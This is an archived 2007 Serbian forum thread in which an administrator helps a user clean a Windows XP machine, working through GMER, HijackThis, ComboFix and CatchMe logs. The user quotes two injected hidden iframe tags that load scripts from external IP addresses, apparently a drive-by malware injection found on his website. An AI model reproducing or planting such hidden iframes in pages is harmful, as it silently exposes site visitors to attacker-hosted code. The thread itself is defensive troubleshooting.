MyCity » Ambulanta -> Arhiva Ambulante » Nepoznat kod na sajtu

Nepoznat kod na sajtu

Napisano na dan: 15.11.2007

Strana:
1
2
3

Nepoznat kod na sajtu

Pagination

Prethodna strana

Sledeća strana

Pagination

Odgovori

Strana:
1
2
3

bobby Poslao: 18 Nov 2007 14:08 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Daj mi sledeci fajl na proveru: C:\WINDOWS\system32\UMonit.exe Uploaduj ga preko sledece forme: http://www.mycity.rs/ambulanta-upload.php Skini ComboFix sa jedne od sledecih adresa: http://www.techsupportforum.com/sectools/sUBs/ComboFix.exe http://download.bleepingcomputer.com/sUBs/ComboFix.exe Startuj ga i ne diraj prozor programa dok skenira. Sledi uputstva na ekranu. Kada zavrsi pojavice se log koji ces nam ovde iskopirati.

Profil

Stenley Poslao: 18 Nov 2007 15:01 Idi na vrh
offline Stenley Zaslužni građanin Pridružio: 01 Mar 2005 Poruke: 549 Gde živiš: Apatin	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Uploadovao sam fajl. Dopuna: 18 Nov 2007 15:01 Citat: Current date is 2007-11-18. This copy of ComboFix has expired.Please download an updated copy.

Profil

bobby Poslao: 18 Nov 2007 15:04 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Sa oba linka kada skines prikazuje istu tu poruku?

Profil

Stenley Poslao: 18 Nov 2007 15:15 Idi na vrh
offline Stenley Zaslužni građanin Pridružio: 01 Mar 2005 Poruke: 549 Gde živiš: Apatin	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Da. Skino sam obadva fajla i pokreno ali nece...istu poruku izbacuje. Dopuna: 18 Nov 2007 15:15 Uočio sam još nešto kod ovoga: `<iframe src='http://81.95.149.77/t.php' width='1' height='1' style='visibility:hidden'></iframe>` Se pojavljuje se ubacuje iznad </body> tag-a dok `<iframe src='http://78.109.21.114/t.php' width='1' height='1' style='visibility: hidden;'></iframe>` se pojavljuje ispod <body>

Profil

bobby Poslao: 18 Nov 2007 15:16 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Uradi sledeće: Preuzmi fajl gmer.zip sa ovog linka i sačuvaj na Desktop-u. Raspakuj ga u neki folder. Dupli klik na gmer.exe za početak: Izaberi Rootkit Tab na vrhu. Klikni na Scan. Kada je skeniranje završeno, klik na Copy dugme ispod - ovo će sačuvati to u Clipboard. U polju za pisanje poruke na forumu klikni desno dugme misa i odaberi opciju Paste.

Profil

Stenley Poslao: 18 Nov 2007 15:50 Idi na vrh
offline Stenley Zaslužni građanin Pridružio: 01 Mar 2005 Poruke: 549 Gde živiš: Apatin	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! GMER 1.0.13.12551 - http://www.gmer.net Rootkit scan 2007-11-18 15:49:02 Windows 5.1.2600 Service Pack 2 ---- User code sections - GMER 1.0.13 ---- .text C:\Program Files\MSN Messenger\MsnMsgr.Exe[2560] kernel32.dll!SetUnhandledExceptionFilter 7C84467D 5 Bytes JMP 004DE392 C:\Program Files\MSN Messenger\MsnMsgr.Exe ---- Devices - GMER 1.0.13 ---- AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CREATE [AA42BFE2] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CREATE_NAMED_PIPE [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CLOSE [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_READ [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_WRITE [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_INFORMATION [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_INFORMATION [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_EA [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_EA [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_FLUSH_BUFFERS [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_VOLUME_INFORMATION [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_VOLUME_INFORMATION [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_DIRECTORY_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_FILE_SYSTEM_CONTROL [AA42BBEC] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_DEVICE_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_INTERNAL_DEVICE_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SHUTDOWN [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_LOCK_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CLEANUP [AA42C3D4] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_CREATE_MAILSLOT [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_SECURITY [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_SECURITY [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_POWER [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SYSTEM_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_DEVICE_CHANGE [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_QUERY_QUOTA [AA42C67A] amon.sys AttachedDevice \FileSystem\Ntfs \Ntfs IRP_MJ_SET_QUOTA [AA42C67A] amon.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_CREATE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_CREATE_NAMED_PIPE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_CLOSE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_READ [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_WRITE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_QUERY_INFORMATION [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_SET_INFORMATION [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_QUERY_EA [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_SET_EA [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_FLUSH_BUFFERS [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_QUERY_VOLUME_INFORMATION [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_SET_VOLUME_INFORMATION [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_DIRECTORY_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_FILE_SYSTEM_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_DEVICE_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_INTERNAL_DEVICE_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_SHUTDOWN [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_LOCK_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_CLEANUP [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_CREATE_MAILSLOT [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_QUERY_SECURITY [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_SET_SECURITY [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_POWER [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_SYSTEM_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_DEVICE_CHANGE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_QUERY_QUOTA [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass0 IRP_MJ_SET_QUOTA [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_CREATE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_CREATE_NAMED_PIPE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_CLOSE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_READ [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_WRITE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_QUERY_INFORMATION [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_SET_INFORMATION [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_QUERY_EA [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_SET_EA [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_FLUSH_BUFFERS [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_QUERY_VOLUME_INFORMATION [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_SET_VOLUME_INFORMATION [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_DIRECTORY_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_FILE_SYSTEM_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_DEVICE_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_INTERNAL_DEVICE_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_SHUTDOWN [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_LOCK_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_CLEANUP [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_CREATE_MAILSLOT [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_QUERY_SECURITY [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_SET_SECURITY [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_POWER [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_SYSTEM_CONTROL [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_DEVICE_CHANGE [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_QUERY_QUOTA [F7A159D0] SynTP.sys AttachedDevice \Driver\Kbdclass \Device\KeyboardClass1 IRP_MJ_SET_QUOTA [F7A159D0] SynTP.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_CREATE [AA42BFE2] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_CREATE_NAMED_PIPE [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_CLOSE [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_READ [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_WRITE [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_QUERY_INFORMATION [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_SET_INFORMATION [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_QUERY_EA [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_SET_EA [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_FLUSH_BUFFERS [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_QUERY_VOLUME_INFORMATION [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_SET_VOLUME_INFORMATION [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_DIRECTORY_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_FILE_SYSTEM_CONTROL [AA42BBEC] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_DEVICE_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_INTERNAL_DEVICE_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_SHUTDOWN [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_LOCK_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_CLEANUP [AA42C3D4] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_CREATE_MAILSLOT [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_QUERY_SECURITY [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_SET_SECURITY [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_POWER [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_SYSTEM_CONTROL [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_DEVICE_CHANGE [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_QUERY_QUOTA [AA42C67A] amon.sys AttachedDevice \FileSystem\Fastfat \Fat IRP_MJ_SET_QUOTA [AA42C67A] amon.sys ---- Files - GMER 1.0.13 ---- File C:\Documents and Settings\Ilija\Local Settings\Temp\bat7AD0.tmp ADS D:\Download\install\Bitcomet (torrent)\BitComet\Podesavanja Bit Comet\Preferences od torrenta koji skida:KAVICHS ---- EOF - GMER 1.0.13 ----

Profil

bobby Poslao: 18 Nov 2007 15:54 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Skini CatchMe. Dvoklikom pokreni program i pređi na tab Script. U (beli) prozor programa iskopiraj tekst koji se nalazi unutar kod polja: `files to kill: C:\Documents and Settings\Ilija\Local Settings\Temp\bat7AD0.tmp` Klikni na taster Run. Nakon toga bi na Desktop-u trebao da se nalazi file catchme.zip. Uploaduj mi taj file preko one forme za upload, i ovde iskopiraj sadržaj file-a catchme.log koji će se nalaziti na desktopu. Odmah nakon toga napravi i novi HijackThis log koji ces mi ovde postaviti.

Profil

Stenley Poslao: 18 Nov 2007 16:18 Idi na vrh
offline Stenley Zaslužni građanin Pridružio: 01 Mar 2005 Poruke: 549 Gde živiš: Apatin	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! `source file error: C:\Documents and Settings\Ilija\Local Settings\Temp\bat7AD0.tmp` Dopuna: 18 Nov 2007 16:18 Fajl je uspesno uploadovan. Logfile of Trend Micro HijackThis v2.0.2 Scan saved at 16:16:40, on 18.11.2007 Platform: Windows XP SP2 (WinNT 5.01.2600) MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180) Boot mode: Normal Running processes: C:\WINDOWS\System32\smss.exe C:\WINDOWS\system32\winlogon.exe C:\WINDOWS\system32\services.exe C:\WINDOWS\system32\lsass.exe C:\WINDOWS\system32\svchost.exe C:\WINDOWS\System32\svchost.exe C:\WINDOWS\system32\spoolsv.exe c:\xampp\apache\bin\apache.exe C:\xampp\mysql\bin\mysqld-nt.exe C:\Program Files\Eset\nod32krn.exe C:\WINDOWS\system32\svchost.exe C:\xampp\apache\bin\apache.exe C:\WINDOWS\Explorer.EXE C:\WINDOWS\system32\UMonit.exe C:\Program Files\Eset\nod32kui.exe C:\Program Files\MSN Messenger\MsnMsgr.Exe C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe C:\Program Files\Messenger\msmsgs.exe C:\WINDOWS\System32\svchost.exe C:\Program Files\Winamp\winamp.exe C:\Program Files\Skype\Phone\Skype.exe C:\Program Files\MSN Messenger\usnsvc.exe C:\Program Files\Skype\Plugin Manager\SkypePM.exe C:\Program Files\The Bat!\thebat.exe C:\Program Files\ICQLite\ICQLite.exe C:\GNG_ScRipT\Mirc.exe C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Trend Micro\HijackThis\HijackThis.exe R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll O2 - BHO: Skype add-on (mastermind) - {22BF413B-C6D2-4d91-82A9-A0F997BA588C} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll O2 - BHO: flashget urlcatch - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\Program Files\FlashGet\jccatch.dll O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file) O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\2.0.301.7164\swg.dll O2 - BHO: FlashGet GetFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\Program Files\FlashGet\getflash.dll O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll O4 - HKLM\..\Run: [UMonit] C:\WINDOWS\system32\UMonit.exe O4 - HKLM\..\Run: [ICQ Lite] "C:\Program Files\ICQLite\ICQLite.exe" -minimize O4 - HKLM\..\Run: [nod32kui] "C:\Program Files\Eset\nod32kui.exe" /WAITSERVICE O4 - HKCU\..\Run: [MsnMsgr] "C:\Program Files\MSN Messenger\MsnMsgr.Exe" /background O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background O4 - HKCU\..\RunOnce: [ICQ Lite] C:\Program Files\ICQLite\ICQLite.exe -trayboot O4 - HKUS\S-1-5-19\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'LOCAL SERVICE') O4 - HKUS\S-1-5-20\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'NETWORK SERVICE') O4 - HKUS\S-1-5-18\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM') O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user') O8 - Extra context menu item: &Download All with FlashGet - C:\Program Files\FlashGet\jc_all.htm O8 - Extra context menu item: &Download with FlashGet - C:\Program Files\FlashGet\jc_link.htm O8 - Extra context menu item: Append to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html O8 - Extra context menu item: Convert link target to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html O8 - Extra context menu item: Convert link target to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html O8 - Extra context menu item: Convert selected links to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECaptureSelLinks.html O8 - Extra context menu item: Convert selected links to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppendSelLinks.html O8 - Extra context menu item: Convert selection to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html O8 - Extra context menu item: Convert selection to existing PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIEAppend.html O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Adobe\Acrobat 8.0\Acrobat\AcroIEFavClient.dll/AcroIECapture.html O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\system32\msjava.dll O9 - Extra button: Run WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll O9 - Extra 'Tools' menuitem: Launch WinHTTrack - {36ECAF82-3300-8F84-092E-AFF36D6C7040} - C:\Program Files\WinHTTrack\WinHTTrackIEBar.dll O9 - Extra button: Skype - {77BF5300-1474-4EC7-9980-D32B190E9B07} - C:\Program Files\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL O9 - Extra button: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe O9 - Extra 'Tools' menuitem: ICQ Lite - {B863453A-26C3-4e1f-A54D-A2CD196348E9} - C:\Program Files\ICQLite\ICQLite.exe O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe O9 - Extra 'Tools' menuitem: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe O16 - DPF: {5D69485C-EAB1-42AE-93C1-B5A53F238C5A} (FileInterface Class) - https://online.bancaintesabeograd.com/RetailDLL/FSINT.dll O16 - DPF: {76326493-E84F-4D4B-939C-1E07B50037F2} (ProxyModule Class) - https://online.bancaintesabeograd.com/RetailDLL/SGCMSCCD.DLL O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (MSN Games - Installer) - http://messenger.zone.msn.com/binary/ZIntro.cab56649.cab O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab O16 - DPF: {E6187999-9FEC-46A1-A20F-F4CA977D5643} (ZoneChess Object) - http://messenger.zone.msn.com/binary/Chess.cab57176.cab O17 - HKLM\System\CCS\Services\Tcpip\..\{C72106D4-8F9E-480D-B84D-78814D34522E}: NameServer = 212.200.166.8 212.200.166.6 O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\COMMON~1\Skype\SKYPE4~1.DLL O23 - Service: Apache2.2 - Apache Software Foundation - c:\xampp\apache\bin\apache.exe O23 - Service: mysql - Unknown owner - C:\xampp\mysql\bin\mysqld-nt.exe O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Program Files\Eset\nod32krn.exe O23 - Service: XAMPP Service (XAMPP) - Unknown owner - c:\xampp\service.exe -- End of file - 7802 bytes

Profil

bobby Poslao: 18 Nov 2007 17:11 Idi na vrh
offline bobby Administrator Pridružio: 04 Sep 2003 Poruke: 24135 Gde živiš: Wien	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Nista, prazan ZIP. Ajmo ovako: Dupli klik na gmer.exe za početak: Izaberi Rootkit Tab na vrhu. Klikni na Scan. Kada je skeniranje završeno, klik na Copy dugme ispod - ovo će sačuvati to u Clipboard. Iskoristi opciju Paste u Notepad-u da bi to prebacio u tekst. Snimi taj tekst iz Notepada kao file1.txt. Ponovi ovo isto sa Autostart Tab-om. Snimi taj tekst iz Notepada kao file2.txt. Iskopiraj nam ovde sadrzaj ta dva fajla koja smo malopre snimili

Profil

Stenley Poslao: 18 Nov 2007 21:43 Idi na vrh
offline Stenley Zaslužni građanin Pridružio: 01 Mar 2005 Poruke: 549 Gde živiš: Apatin	0Niko još nije pohvalio poruku. Registruj se da bi pohvalio/la poruku! Uloguj se preko Facebooka da bi skinuo fajl: Evo fajlova: - https://www.mycity.rs/must-login.png - https://www.mycity.rs/must-login.png

Profil

MyCity » Ambulanta -> Arhiva Ambulante » Nepoznat kod na sajtu

Ko je trenutno na forumu

Ukupno su 762 korisnika na forumu :: 10 registrovanih, 2 sakrivenih i 750 gosta :: [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:: Korisnici trenutno na forumu: 357magnum, babaroga, bigfoot, Georgius, minmatar34957, ruso, samsung, sasa87, Tila Painen, Žoržo

Svaki korisnik ovog sajta je odgovoran za sadržaj svoje poruke koju objavi na sajtu. Sajt se odriče svake odgovornosti za sadržaj tih poruka.
Postavljanjem vaše poruke ili vašeg autorskog dela na ovaj sajt, saglasni ste da ovaj sajt postaje distributer vašeg dela, i odričete se mogućnosti njegovog povlačenja ili brisanja, bez saglasnosti uprave sajta.
Distribucija sadržaja sa ovog sajta je dozvoljena samo u nekomercijalne svrhe, uz obaveznu napomenu da je sadržaj preuzet sa ovog sajta, i uz obavezno navođenje adrese MyCity sajta. Za sve ostale vidove distribucije obavezni ste da prethodno zatražite odobrenje od vlasnika MyCity sajta.
MyCity pokrenuo, administrira i razvija Predrag Damnjanović, a o uređenju sajta se brine MyCity Tim.
Ukoliko želite da nas kontaktirate kliknite ovde.
Naši sajtovi:
Vesti, Vojni forum, Zaštita od virusa, TekstPesme.rs

This content is licensed under a Creative Commons License.
Based on phpBB 2, translated by Simke, designed by